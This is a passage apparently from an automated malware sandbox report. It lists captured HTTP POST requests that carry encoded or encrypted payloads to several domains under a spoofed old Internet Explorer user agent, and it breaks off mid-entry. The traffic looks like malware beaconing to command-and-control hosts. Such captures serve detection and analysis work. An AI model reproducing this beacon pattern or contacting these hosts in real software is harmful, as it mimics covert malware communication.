LzaE9C2HiZlMOyCQJL6rB+aThqwbDvXcsdodNCoZifJzowtT2/q4suFsvOFCavTUN/pByj3D6Potdm6gOZggHI/CsyiyQ/MsOJ2Gi8BZtB2r3m8DRaHZiDWaGJIaf05//h9R2oKGA65+K2w9VOJ27ej6QaGmd5QNOEuMFLJTmt2hEhvge/r/HFchnam0x6kD20m6XwuEhzl0kF2VB8JPGR82Ir9HynsW2PWqdksVQVE04hhwov/1p9ChG0gRWbF9IvY0egh5gf2XRmPuPIEKAf5rvoD9jDyQwqq4J0UsXY+h6x7P2b6pvRXF6KVsWKhl6UgFczc6+6mYNBSi6x7Re0L6oCZCYELdmcphLVouEixhBjqGldbqREQLpPWhXSgJdrG7zwUZOdJNlNfPObDmT841MjXs3fCyaqlqg4IhGEZXsdR9W2YYo3YHqreBxZnOoQZWW0Nqdcy/uuwSZ0X1GeFRQxQrNihToOEF78x8GwgLrxajCeJe2kIptbY9yIY9GTuIGUqv2guOUE469NkfNsDGPGEV9ydi8CmRFPIeC4ViG2qZB+c/nMCQuRL44YhKn2RiRAiy2rf28CGk+gaF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 4b 72 71 34 64 48 6c 52 6e 70 6e 79 54 48 30 6e 43 45 7a 41 45 68 4a 73 6b 30 64 58 64 4b 4a 63 76 51 4e 61 54 44 63 31 50 6d 59 4c 56 2f 50 75 4d 48 4b 33 75 6c 2f 4f 77 65 6e 6a 53 47 66 50 6d 7a 5a 78 78 6f 64 74 42 74 68 50 4a 47 6e 6b 4d 35 31 67 76 6a 37 52 37 53 55 6a 54 4b 6d 44 61 7a 61 31 67 38 6d 31 59 57 45 2b 75 57 64 57 4d 6b 2f 58 4f 35 39 50 6b 66 77 31 61 34 43 34 63 76 41 30 53 41 37 6f 2f 74 34 63 59 79 6f 50 65 54 37 62 57 66 4d 33 69 6a 66 69 4f 5a 71 4b 70 2b 32 41 54 56 44 47 53 57 45 51 47 47 36 36 4b 69 49 54 56 65 61 70 6c 32 78 32 78 51 55 64 2b 62 2b 38 47 42 36 66 6f 4e 49 64 32 63 45 43 65 77 59 69 49 64 37 54 2b 79 73 42 59 42 33 55 71 37 61 33 7a 4a 42 47 37 76 49 4b 77 2f 4d 35 6a 53 69 4a 69 6d 79 7a 34 51 55 71 6f 42 53 6b 44 76 71 45 4d 4d 6b 51 4d 76 30 59 70 4a 74 4f 5a 64 73 30 32 55 6c 2b 7a 73 48 42 35 65 4e 64 5a 75 53 42 30 32 64 58 51 68 66 39 64 55 71 50 62 33 5a 47 45 47 78 78 51 4f 66 52 7a 67 2f 33 56 66 73 77 34 43 61 53 42 46 7a 70 7a 6f 4a 79 58 32 78 49 59 61 75 58 42 65 7a 31 55 61 4c 67 4a 52 62 63 63 78 51 56 78 73 49 35 33 77 47 6c 47 4d 52 73 64 68 4e 50 7a 2b 69 39 64 6a 47 5a 39 36 59 72 56 2b 6e 72 75 66 6b 77 55 4c 4d 6d 63 73 43 52 56 6a 6b 34 56 5a 63 74 33 42 48 54 6b 45 4f 6a 65 37 32 72 43 35 70 31 39 33 72 38 67 64 6b 72 6d 6c 52 31 57 35 6c 52 6f 65 4c 39 4a 46 62 6e 4e 4b 6a 35 76 57 45 43 67 71 35 6f 45 52 4f 2b 66 73 7a 70 37 77 54 58 35 2b 7a 34 6c 39 33 61 52 53 4c 33 74 6d 67 4c 75 4c 4f 41 77 6c 63 42 46 56 47 45 6a 34 75 77 43 32 69 54 38 58 42 70 76 42 75 33 50 7a 5a 62 34 63 58 5a 59 38 55 43 41 43 76 47 37 59 73 4a 6f 56 38 35 Data Ascii: Krq4dHlRnpnyTH0nCEzAEhJsk0dXdKJcvQNaTDc1PmYLV/PuMHK3ul/OwenjSGfPmzZxxodtBthPJGnkM51gvj7R7SUjTKmDaza1g8m1YWE+uWdWMk/XO59Pkfw1a4C4cvA0SA7o/t4cYyoPeT7bWfM3ijfiOZqKp+2ATVDGSWEQGG66KiITVeapl2x2xQUd+b+8GB6foNId2cECewYiId7T+ysBYB3Uq7a3zJBG7vIKw/M5jSiJimyz4QUqoBSkDvqEMMkQMv0YpJtOZds02Ul+zsHB5eNdZuSB02dXQhf9dUqPb3ZGEGxxQOfRzg/3Vfsw4CaSBFzpzoJyX2xIYauXBez1UaLgJRbccxQVxsI53wGlGMRsdhNPz+i9djGZ96YrV+nrufkwULMmcsCRVjk4VZct3BHTkEOje72rC5p193r8gdkrmlR1W5lRoeL9JFbnNKj5vWECgq5oERO+fszp7wTX5+z4l93aRSL3tmgLuLOAwlcBFVGEj4uwC2iT8XBpvBu3PzZb4cXZY8UCACvG7YsJoV85
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 36 4f 63 5a 51 31 52 43 51 5a 6e 31 45 36 79 6f 4c 38 6c 67 66 36 63 67 6d 2f 58 4d 73 56 50 6e 79 42 52 39 71 59 30 65 37 64 64 55 33 68 39 53 67 48 42 53 54 71 69 33 30 71 74 79 63 35 4b 57 67 74 6e 79 2b 34 6a 4c 37 69 32 79 55 68 6a 37 71 5a 62 52 6a 57 2b 76 44 35 71 41 45 31 30 6b 6e 38 4d 2f 6e 35 61 2f 4e 69 73 71 6f 50 78 64 37 6e 72 58 72 2f 69 48 71 63 4f 74 47 46 6c 7a 6a 4c 69 51 4c 2b 69 63 4a 70 4c 70 47 64 75 4a 55 4f 78 7a 4b 78 76 74 73 71 76 45 31 41 65 79 45 62 63 67 32 37 6f 70 48 52 4c 76 70 4e 76 5a 70 43 45 33 70 58 4b 75 49 47 6f 47 4a 53 72 70 78 45 7a 54 68 53 35 37 38 62 41 4c 35 62 70 59 4e 54 73 77 65 57 7a 65 6a 47 43 4f 78 38 61 78 42 79 58 46 4b 44 7a 31 4a 33 43 58 6d 4d 70 76 4a 52 44 6f 34 79 52 61 77 52 75 42 4a 53 72 35 75 72 2b 34 59 6e 74 6c 33 5a 66 46 62 32 62 2b 54 2b 75 73 73 38 4c 75 61 44 4e 4c 36 56 7a 6e 39 49 4a 53 48 4d 43 67 74 6a 50 55 45 67 41 72 50 4f 49 32 70 4d 38 77 6d 2f 34 68 4a 33 61 6a 49 4e 32 6d 35 4c 75 35 6d 74 63 73 75 48 6f 4a 48 6a 31 39 42 67 6b 2b 74 36 4f 57 65 7a 47 50 73 6e 70 51 54 4f 62 74 54 31 41 4a 6c 55 68 36 31 66 7a 50 44 63 41 62 4e 6c 44 42 7a 63 34 57 33 69 31 54 47 73 64 49 7a 66 59 35 46 52 65 41 55 76 32 58 31 70 4e 62 61 4b 38 34 67 35 38 5a 6b 30 4a 63 37 4c 6e 50 77 2b 30 6c 7a 5a 64 6f 7a 4e 63 5a 72 7a 33 59 61 34 33 64 4c 46 53 52 4c 48 31 34 57 66 46 75 42 6d 59 7a 35 66 4f 41 43 61 78 52 6c 62 35 58 76 76 46 47 34 76 63 39 62 74 55 77 2b 70 61 75 69 6e 30 71 41 6c 43 4e 58 46 6b 78 55 79 4e 31 33 45 50 73 54 4b 30 56 74 5a 37 68 4e 69 44 71 55 65 53 45 54 43 66 4d 33 33 57 63 6d 71 43 6c 61 48 61 57 4c 6c 75 30 31 50 6b 45 5a 4f 31 42 45 51 69 30 Data Ascii: 6OcZQ1RCQZn1E6yoL8lgf6cgm/XMsVPnyBR9qY0e7ddU3h9SgHBSTqi30qtyc5KWgtny+4jL7i2yUhj7qZbRjW+vD5qAE10kn8M/n5a/NisqoPxd7nrXr/iHqcOtGFlzjLiQL+icJpLpGduJUOxzKxvtsqvE1AeyEbcg27opHRLvpNvZpCE3pXKuIGoGJSrpxEzThS578bAL5bpYNTsweWzejGCOx8axByXFKDz1J3CXmMpvJRDo4yRawRuBJSr5ur+4Yntl3ZfFb2b+T+uss8LuaDNL6Vzn9IJSHMCgtjPUEgArPOI2pM8wm/4hJ3ajIN2m5Lu5mtcsuHoJHj19Bgk+t6OWezGPsnpQTObtT1AJlUh61fzPDcAbNlDBzc4W3i1TGsdIzfY5FReAUv2X1pNbaK84g58Zk0Jc7LnPw+0lzZdozNcZrz3Ya43dLFSRLH14WfFuBmYz5fOACaxRlb5XvvFG4vc9btUw+pauin0qAlCNXFkxUyN13EPsTK0VtZ7hNiDqUeSETCfM33WcmqClaHaWLlu01PkEZO1BEQi0
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 55 4b 59 64 31 69 68 37 6f 5a 6e 31 55 47 58 4b 36 79 53 63 5a 35 76 55 37 45 4d 77 58 51 45 43 33 49 68 35 41 38 4d 2b 68 58 50 66 68 71 75 59 50 32 55 4f 56 65 4a 4d 65 5a 34 6a 44 73 49 32 2f 57 45 79 67 44 6e 6c 39 66 6f 66 75 35 57 50 37 45 44 6e 36 67 74 55 78 31 66 47 4b 69 34 34 67 36 54 55 57 6e 35 4c 43 75 78 38 2f 79 70 39 46 68 45 37 30 2f 49 38 58 79 33 65 36 4f 34 54 2f 38 4c 2b 41 51 32 65 2b 31 69 42 77 72 68 6e 36 76 38 7a 65 39 57 78 58 2f 47 56 4c 76 64 5a 71 6d 34 78 71 35 38 52 58 74 47 71 34 52 51 45 41 66 52 61 30 74 56 39 79 4d 75 49 67 2f 54 52 44 6e 76 4a 64 52 43 4d 4a 59 34 2b 79 57 66 55 71 35 5a 71 53 49 35 75 61 79 48 46 6e 4a 65 66 44 78 59 76 4d 4d 5a 41 56 6f 74 75 46 77 4f 34 54 6a 37 46 2f 50 63 49 44 67 55 53 45 32 6b 54 4e 32 64 38 71 50 42 59 61 76 65 6f 39 70 72 2b 47 47 41 6c 53 44 56 65 6d 44 6e 44 2b 2b 61 6a 58 46 41 33 51 35 53 43 73 44 74 78 36 68 39 70 6b 51 76 48 4b 54 74 72 30 34 6d 58 63 6a 74 41 6b 41 30 36 68 33 55 54 2b 72 58 50 45 42 46 59 30 6f 53 6e 6a 43 6b 78 6e 37 5a 35 4c 55 34 4d 6f 6b 65 69 51 74 34 36 4b 6d 32 38 31 4a 59 4e 32 6d 47 67 6c 68 39 57 47 4f 66 36 6d 46 78 31 6c 4e 6e 54 71 77 50 31 57 52 74 79 43 38 49 36 79 51 6e 44 70 53 34 31 66 5a 71 73 67 35 79 47 4a 4b 56 71 48 70 4b 6e 77 49 72 75 41 55 2b 2b 6c 65 62 48 39 55 56 6b 6e 52 51 59 67 48 4a 6a 78 77 48 67 65 75 45 4c 5a 42 6c 76 56 4d 76 73 69 6d 4b 72 71 43 59 4a 46 72 4c 67 2b 50 67 61 62 70 39 73 55 68 49 61 6f 44 69 71 61 70 52 6d 38 46 2b 66 64 76 76 30 75 66 54 55 34 43 41 38 45 37 2b 2f 50 36 63 4c 47 35 52 36 58 32 54 59 44 61 74 79 54 62 55 57 71 70 6c 77 6a 2b 5a 49 51 39 31 48 42 43 4f 74 4d 73 41 30 52 74 2b 67 77 4a 33 50 34 77 3d 3d Data Ascii: UKYd1ih7oZn1UGXK6yScZ5vU7EMwXQEC3Ih5A8M+hXPfhquYP2UOVeJMeZ4jDsI2/WEygDnl9fofu5WP7EDn6gtUx1fGKi44g6TUWn5LCux8/yp9FhE70/I8Xy3e6O4T/8L+AQ2e+1iBwrhn6v8ze9WxX/GVLvdZqm4xq58RXtGq4RQEAfRa0tV9yMuIg/TRDnvJdRCMJY4+yWfUq5ZqSI5uayHFnJefDxYvMMZAVotuFwO4Tj7F/PcIDgUSE2kTN2d8qPBYaveo9pr+GGAlSDVemDnD++ajXFA3Q5SCsDtx6h9pkQvHKTtr04mXcjtAkA06h3UT+rXPEBFY0oSnjCkxn7Z5LU4MokeiQt46Km281JYN2mGglh9WGOf6mFx1lNnTqwP1WRtyC8I6yQnDpS41fZqsg5yGJKVqHpKnwIruAU++lebH9UVknRQYgHJjxwHgeuELZBlvVMvsimKrqCYJFrLg+Pgabp9sUhIaoDiqapRm8F+fdvv0ufTU4CA8E7+/P6cLG5R6X2TYDatyTbUWqplwj+ZIQ91HBCOtMsA0Rt+gwJ3P4w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 4e 64 35 4c 6d 48 58 4a 70 35 6d 68 6d 34 74 77 33 4d 79 6c 6b 47 34 78 45 70 67 44 6f 72 41 37 65 61 55 59 62 30 34 55 2f 4d 4e 79 72 2f 2f 6d 79 70 4d 7a 4f 57 77 35 43 6f 46 6d 68 2b 34 6a 53 32 62 72 51 73 33 67 76 34 55 53 46 36 33 4d 4d 49 55 49 43 64 55 4e 46 34 78 6f 62 6b 37 36 76 2b 75 67 32 6e 74 67 42 79 66 6d 45 52 4a 4b 51 6f 56 74 2b 4e 53 31 70 39 38 6f 32 36 7a 43 4e 76 39 66 46 74 73 71 56 4c 69 4f 68 4c 33 72 52 61 64 59 7a 57 51 46 31 79 37 4b 6a 68 75 63 49 72 34 77 33 4d 6e 50 37 52 59 32 35 57 48 2f 6d 4b 64 6f 73 5a 64 55 30 56 64 65 38 47 4a 32 46 35 54 5a 79 46 4a 48 4e 65 58 4d 56 34 4f 39 67 73 7a 2b 4c 47 68 70 35 54 47 30 7a 79 59 6b 4c 73 6f 70 6a 70 63 55 76 4d 35 53 78 66 51 76 46 65 31 57 35 51 52 50 6e 71 2b 49 6d 67 46 57 51 56 46 64 70 54 78 39 4b 4f 2b 55 79 55 79 30 64 6c 62 75 42 64 43 39 6f 69 6c 4f 56 73 32 46 42 6c 71 4a 31 6e 4a 75 74 6a 79 45 59 4f 52 5a 6f 62 62 4e 39 5a 5a 37 61 6f 58 55 36 58 31 71 6c 58 73 6e 44 30 70 44 57 43 38 6b 79 61 78 53 70 6a 79 78 70 47 64 77 6a 41 67 6e 6c 4e 43 30 31 77 6f 6c 57 6c 70 62 49 2f 4a 75 76 6a 51 49 6b 58 6c 63 53 49 45 33 75 76 75 76 6c 4c 62 66 61 6d 35 64 65 37 54 56 61 79 44 49 63 77 57 57 49 6c 74 6b 73 78 63 4f 50 59 47 4e 68 44 66 42 6a 39 33 5a 4b 6d 31 67 39 64 6d 57 78 32 4e 74 4a 69 2b 57 43 77 6d 65 6d 49 2b 69 77 45 73 41 76 65 66 5a 64 53 41 41 79 48 31 6f 30 77 37 52 5a 79 37 74 6b 70 2b 4b 38 44 76 44 61 4b 38 6c 32 52 6a 57 35 65 49 37 67 5a 6e 49 57 4d 39 42 42 75 79 2f 6c 62 43 57 6f 45 62 57 73 77 77 45 78 6b 6f 75 37 70 57 62 4a 7a 61 4f 61 64 33 4e 74 53 78 6f 56 2f 66 38 31 36 68 31 64 42 63 3d Data Ascii: Nd5LmHXJp5mhm4tw3MylkG4xEpgDorA7eaUYb04U/MNyr//mypMzOWw5CoFmh+4jS2brQs3gv4USF63MMIUICdUNF4xobk76v+ug2ntgByfmERJKQoVt+NS1p98o26zCNv9fFtsqVLiOhL3rRadYzWQF1y7KjhucIr4w3MnP7RY25WH/mKdosZdU0Vde8GJ2F5TZyFJHNeXMV4O9gsz+LGhp5TG0zyYkLsopjpcUvM5SxfQvFe1W5QRPnq+ImgFWQVFdpTx9KO+UyUy0dlbuBdC9oilOVs2FBlqJ1nJutjyEYORZobbN9ZZ7aoXU6X1qlXsnD0pDWC8kyaxSpjyxpGdwjAgnlNC01wolWlpbI/JuvjQIkXlcSIE3uvuvlLbfam5de7TVayDIcwWWIltksxcOPYGNhDfBj93ZKm1g9dmWx2NtJi+WCwmemI+iwEsAvefZdSAAyH1o0w7RZy7tkp+K8DvDaK8l2RjW5eI7gZnIWM9BBuy/lbCWoEbWswwExkou7pWbJzaOad3NtSxoV/f816h1dBc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 34 41 70 56 71 53 35 58 71 4a 6d 72 33 6f 50 66 4f 62 51 31 6f 4a 45 38 31 6d 71 75 36 45 30 69 51 70 4b 37 62 4d 42 72 47 45 7a 72 30 58 6d 2f 37 2b 51 4e 2b 70 52 4e 68 75 33 63 39 49 38 30 69 2f 73 30 4a 71 53 51 78 56 2b 43 61 39 62 5a 54 50 32 69 6c 68 74 55 6f 6a 37 63 75 6c 62 6d 47 57 4d 65 6a 77 33 30 4f 57 32 56 38 47 56 32 59 4d 78 64 44 4e 66 36 6a 42 69 39 48 57 62 47 33 53 72 78 4e 34 33 75 69 44 77 75 44 72 49 54 74 61 73 6f 76 49 72 64 58 6a 6c 31 68 2b 2f 39 59 6c 61 73 2b 56 4b 50 53 6f 33 43 4a 74 51 6e 79 36 6e 56 6a 32 78 74 79 55 67 75 7a 49 48 67 32 55 2f 42 72 70 77 42 45 33 6f 69 2b 73 42 36 36 4f 50 42 37 62 54 2b 61 78 34 37 51 4a 38 4c 4c 2b 31 31 57 74 31 2f 54 31 39 52 66 52 53 50 67 77 49 69 54 4b 75 42 39 5a 66 76 65 4d 50 31 63 6c 56 66 5a 4d 6b 32 67 32 4f 33 5a 56 41 71 77 6e 4f 2f 59 36 43 67 49 59 51 70 33 54 56 54 63 7a 6a 50 55 78 39 37 61 6a 6e 53 4e 7a 38 63 78 58 4b 2f 54 68 52 31 2f 66 74 51 57 69 6e 49 4d 33 69 38 31 47 30 63 43 4d 51 54 4b 6a 54 33 54 68 59 54 67 4e 41 37 6c 71 61 73 72 32 6c 5a 39 57 58 4f 49 45 39 38 45 72 55 30 68 37 47 76 59 5a 41 46 74 64 2b 73 72 56 62 44 77 41 31 55 65 6d 7a 34 73 73 61 41 37 4c 6d 35 41 54 61 4f 36 5a 64 74 48 61 55 4d 77 4a 35 72 71 75 36 75 32 71 73 59 79 31 41 73 34 77 70 38 34 4d 44 70 31 32 63 4a 67 45 46 45 6b 6d 53 57 64 7a 63 70 2b 4c 5a 6a 6e 52 4b 6d 44 63 4d 49 58 63 54 59 73 59 51 78 38 74 78 66 36 2f 39 58 39 55 43 63 78 31 65 73 71 59 6c 68 32 4e 65 6d 35 54 56 6d 64 75 52 6c 55 79 52 58 42 4e 6c 4a 59 4e 37 4d 47 34 7a 69 45 62 2f 64 41 2b 47 35 65 72 2b 55 59 38 36 70 6d 44 43 4a 37 70 49 49 48 2b 45 58 58 68 5a 78 50 4d 50 31 54 71 71 4e 71 65 4d 69 35 5a 32 2b 67 32 4e 61 51 68 63 55 62 76 35 4a 4c 37 30 65 74 51 3d 3d Data Ascii: 4ApVqS5XqJmr3oPfObQ1oJE81mqu6E0iQpK7bMBrGEzr0Xm/7+QN+pRNhu3c9I80i/s0JqSQxV+Ca9bZTP2ilhtUoj7culbmGWMejw30OW2V8GV2YMxdDNf6jBi9HWbG3SrxN43uiDwuDrITtasovIrdXjl1h+/9Ylas+VKPSo3CJtQny6nVj2xtyUguzIHg2U/BrpwBE3oi+sB66OPB7bT+ax47QJ8LL+11Wt1/T19RfRSPgwIiTKuB9ZfveMP1clVfZMk2g2O3ZVAqwnO/Y6CgIYQp3TVTczjPUx97ajnSNz8cxXK/ThR1/ftQWinIM3i81G0cCMQTKjT3ThYTgNA7lqasr2lZ9WXOIE98ErU0h7GvYZAFtd+srVbDwA1Uemz4ssaA7Lm5ATaO6ZdtHaUMwJ5rqu6u2qsYy1As4wp84MDp12cJgEFEkmSWdzcp+LZjnRKmDcMIXcTYsYQx8txf6/9X9UCcx1esqYlh2Nem5TVmduRlUyRXBNlJYN7MG4ziEb/dA+G5er+UY86pmDCJ7pIIH+EXXhZxPMP1TqqNqeMi5Z2+g2NaQhcUbv5JL70etQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 36 4f 63 5a 51 31 52 43 51 5a 6e 31 45 36 79 6f 4c 38 6c 67 66 36 63 67 6d 2f 58 4d 73 56 50 6e 79 42 52 39 71 59 30 65 37 64 64 55 33 68 39 53 67 48 42 53 54 71 69 33 30 71 74 79 63 35 4b 57 67 74 6e 79 2b 34 6a 4c 37 69 32 79 55 68 6a 37 71 5a 62 52 6a 57 2b 76 44 35 71 41 45 31 30 6b 6e 38 4d 2f 6e 35 61 2f 4e 69 73 71 6f 50 78 64 37 6e 72 58 72 2f 69 48 71 63 4f 74 47 46 6c 7a 6a 4c 69 51 4c 2b 69 63 4a 70 4c 70 47 64 75 4a 55 4f 78 7a 4b 78 76 74 73 71 76 45 31 41 65 79 45 62 63 67 32 37 6f 70 48 52 4c 76 70 4e 76 5a 70 43 45 33 70 58 4b 75 49 47 6f 47 4a 53 72 70 78 45 7a 54 68 53 35 37 38 62 41 4c 35 62 70 59 4e 54 73 77 65 57 7a 65 6a 47 43 4f 78 38 61 78 42 79 58 46 4b 44 7a 31 4a 33 43 58 6d 4d 70 76 4a 52 44 6f 34 79 52 61 77 52 75 42 4a 53 72 35 75 72 2b 34 59 6e 74 6c 33 5a 66 46 62 32 62 2b 54 2b 75 73 73 38 4c 75 61 44 4e 4c 36 56 7a 6e 39 49 4a 53 48 4d 43 67 74 6a 50 55 45 67 41 72 50 4f 49 32 70 4d 38 77 6d 2f 34 68 4a 33 61 6a 49 4e 32 6d 35 4c 75 35 6d 74 63 73 75 48 6f 4a 48 6a 31 39 42 67 6b 2b 74 36 4f 57 65 7a 47 50 73 6e 70 51 54 4f 62 74 54 31 41 4a 6c 55 68 36 31 66 7a 50 44 63 41 62 4e 6c 44 42 7a 63 34 57 33 69 31 54 47 73 64 49 7a 66 59 35 46 52 65 41 55 76 32 58 31 70 4e 62 61 4b 38 34 67 35 38 5a 6b 30 4a 63 37 4c 6e 50 77 2b 30 6c 7a 5a 64 6f 7a 4e 63 5a 72 7a 33 59 61 34 33 64 4c 46 53 52 4c 48 31 34 57 66 46 75 42 6d 59 7a 35 66 4f 41 43 61 78 52 6c 62 35 58 76 76 46 47 34 76 63 39 62 74 55 77 2b 70 61 75 69 6e 30 71 41 6c 43 4e 58 46 6b 78 55 79 4e 31 33 45 50 73 54 4b 30 56 74 5a 37 68 4e 69 44 71 55 65 53 45 54 43 66 4d 33 33 57 63 6d 71 43 6c 61 48 61 57 4c 6c 75 30 31 50 6b 45 5a 4f 31 42 45 51 69 30 Data Ascii: 6OcZQ1RCQZn1E6yoL8lgf6cgm/XMsVPnyBR9qY0e7ddU3h9SgHBSTqi30qtyc5KWgtny+4jL7i2yUhj7qZbRjW+vD5qAE10kn8M/n5a/NisqoPxd7nrXr/iHqcOtGFlzjLiQL+icJpLpGduJUOxzKxvtsqvE1AeyEbcg27opHRLvpNvZpCE3pXKuIGoGJSrpxEzThS578bAL5bpYNTsweWzejGCOx8axByXFKDz1J3CXmMpvJRDo4yRawRuBJSr5ur+4Yntl3ZfFb2b+T+uss8LuaDNL6Vzn9IJSHMCgtjPUEgArPOI2pM8wm/4hJ3ajIN2m5Lu5mtcsuHoJHj19Bgk+t6OWezGPsnpQTObtT1AJlUh61fzPDcAbNlDBzc4W3i1TGsdIzfY5FReAUv2X1pNbaK84g58Zk0Jc7LnPw+0lzZdozNcZrz3Ya43dLFSRLH14WfFuBmYz5fOACaxRlb5XvvFG4vc9btUw+pauin0qAlCNXFkxUyN13EPsTK0VtZ7hNiDqUeSETCfM33WcmqClaHaWLlu01PkEZO1BEQi0
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 34 41 70 56 71 53 35 58 71 4a 6d 72 33 6f 50 66 4f 62 51 31 6f 4a 45 38 31 6d 71 75 36 45 30 69 51 70 4b 37 62 4d 42 72 47 45 7a 72 30 58 6d 2f 37 2b 51 4e 2b 70 52 4e 68 75 33 63 39 49 38 30 69 2f 73 30 4a 71 53 51 78 56 2b 43 61 39 62 5a 54 50 32 69 6c 68 74 55 6f 6a 37 63 75 6c 62 6d 47 57 4d 65 6a 77 33 30 4f 57 32 56 38 47 56 32 59 4d 78 64 44 4e 66 36 6a 42 69 39 48 57 62 47 33 53 72 78 4e 34 33 75 69 44 77 75 44 72 49 54 74 61 73 6f 76 49 72 64 58 6a 6c 31 68 2b 2f 39 59 6c 61 73 2b 56 4b 50 53 6f 33 43 4a 74 51 6e 79 36 6e 56 6a 32 78 74 79 55 67 75 7a 49 48 67 32 55 2f 42 72 70 77 42 45 33 6f 69 2b 73 42 36 36 4f 50 42 37 62 54 2b 61 78 34 37 51 4a 38 4c 4c 2b 31 31 57 74 31 2f 54 31 39 52 66 52 53 50 67 77 49 69 54 4b 75 42 39 5a 66 76 65 4d 50 31 63 6c 56 66 5a 4d 6b 32 67 32 4f 33 5a 56 41 71 77 6e 4f 2f 59 36 43 67 49 59 51 70 33 54 56 54 63 7a 6a 50 55 78 39 37 61 6a 6e 53 4e 7a 38 63 78 58 4b 2f 54 68 52 31 2f 66 74 51 57 69 6e 49 4d 33 69 38 31 47 30 63 43 4d 51 54 4b 6a 54 33 54 68 59 54 67 4e 41 37 6c 71 61 73 72 32 6c 5a 39 57 58 4f 49 45 39 38 45 72 55 30 68 37 47 76 59 5a 41 46 74 64 2b 73 72 56 62 44 77 41 31 55 65 6d 7a 34 73 73 61 41 37 4c 6d 35 41 54 61 4f 36 5a 64 74 48 61 55 4d 77 4a 35 72 71 75 36 75 32 71 73 59 79 31 41 73 34 77 70 38 34 4d 44 70 31 32 63 4a 67 45 46 45 6b 6d 53 57 64 7a 63 70 2b 4c 5a 6a 6e 52 4b 6d 44 63 4d 49 58 63 54 59 73 59 51 78 38 74 78 66 36 2f 39 58 39 55 43 63 78 31 65 73 71 59 6c 68 32 4e 65 6d 35 54 56 6d 64 75 52 6c 55 79 52 58 42 4e 6c 4a 59 4e 37 4d 47 34 7a 69 45 62 2f 64 41 2b 47 35 65 72 2b 55 59 38 36 70 6d 44 43 4a 37 70 49 49 48 2b 45 58 58 68 5a 78 50 4d 50 31 54 71 71 4e 71 65 4d 69 35 5a 32 2b 67 32 4e 61 51 68 63 55 62 76 35 4a 4c 37 30 65 74 51 3d 3d Data Ascii: 4ApVqS5XqJmr3oPfObQ1oJE81mqu6E0iQpK7bMBrGEzr0Xm/7+QN+pRNhu3c9I80i/s0JqSQxV+Ca9bZTP2ilhtUoj7culbmGWMejw30OW2V8GV2YMxdDNf6jBi9HWbG3SrxN43uiDwuDrITtasovIrdXjl1h+/9Ylas+VKPSo3CJtQny6nVj2xtyUguzIHg2U/BrpwBE3oi+sB66OPB7bT+ax47QJ8LL+11Wt1/T19RfRSPgwIiTKuB9ZfveMP1clVfZMk2g2O3ZVAqwnO/Y6CgIYQp3TVTczjPUx97ajnSNz8cxXK/ThR1/ftQWinIM3i81G0cCMQTKjT3ThYTgNA7lqasr2lZ9WXOIE98ErU0h7GvYZAFtd+srVbDwA1Uemz4ssaA7Lm5ATaO6ZdtHaUMwJ5rqu6u2qsYy1As4wp84MDp12cJgEFEkmSWdzcp+LZjnRKmDcMIXcTYsYQx8txf6/9X9UCcx1esqYlh2Nem5TVmduRlUyRXBNlJYN7MG4ziEb/dA+G5er+UY86pmDCJ7pIIH+EXXhZxPMP1TqqNqeMi5Z2+g2NaQhcUbv5JL70etQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 5a 57 58 64 4f 30 4d 5a 72 5a 6c 33 59 52 44 7a 53 75 33 55 65 57 7a 6f 55 58 76 70 49 4b 51 48 4a 37 4e 37 4d 39 77 6f 36 69 51 59 70 39 52 63 59 4c 78 72 37 55 76 39 5a 6b 4c 4c 35 66 5a 59 70 6f 7a 4d 4b 64 6b 76 54 34 74 5a 34 69 4f 4d 72 74 69 4c 68 78 67 38 4b 31 72 70 6a 47 51 34 55 64 58 35 6b 70 34 70 61 42 33 30 30 76 73 62 39 36 4a 4c 68 6f 53 69 4b 4d 47 78 79 61 5a 36 38 62 75 66 35 79 62 30 59 78 4b 55 2b 43 76 4e 47 78 6f 44 6a 70 36 55 6e 71 45 6a 71 39 76 69 49 37 66 41 34 2b 56 71 78 74 4f 4d 64 4f 54 77 6b 51 45 56 69 30 48 73 49 4a 54 49 45 6f 2f 65 72 62 71 6e 70 63 66 6c 49 2f 76 31 77 38 42 37 4a 73 7a 6c 46 36 6b 6f 41 35 48 4f 2b 57 64 73 35 57 42 54 2f 4e 4e 63 56 4d 75 70 72 77 71 72 69 76 68 42 55 6f 30 75 4d 34 32 33 43 77 76 6e 50 44 67 79 66 33 4e 66 63 4b 63 42 6b 47 6e 30 67 39 65 78 72 4d 54 48 59 4d 78 47 55 7a 69 67 49 69 31 37 55 35 69 34 52 